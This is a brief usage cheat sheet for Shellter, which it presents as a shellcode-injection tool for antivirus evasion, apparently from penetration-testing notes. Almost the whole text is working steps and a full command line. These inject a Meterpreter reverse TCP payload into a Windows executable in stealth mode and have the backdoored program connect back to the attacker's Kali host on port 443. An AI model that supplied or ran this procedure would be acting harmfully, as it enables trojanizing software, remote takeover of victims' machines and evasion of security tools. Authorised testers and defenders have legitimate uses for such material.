Shellter

Dynamic shellcode injection tool for antivirus evasion.

Installation

sudo apt install shellter

Usage

Prerequisite: Wine

Interactive mode

wine /usr/share/windows-resources/shellter/shellter.exe
  • Enter “A” for Automatic mode
  • Enter the .exe file complete path as the PE target.
  • Enter “Y” to enable Stealth Mode.
  • Enter “L” to use listed payload.
  • Enter “1” to use the first payload (Meterpreter_Reverse_TCP)
  • Enter Kali IP address for LHOST
  • Enter “443” for LPORT
  • Press “Enter”

With options on command line

wine /usr/share/windows-resources/shellter/shellter.exe -f file.exe --stealth -p meterpreter_reverse_tcp --lhost $KALI_IP --port 443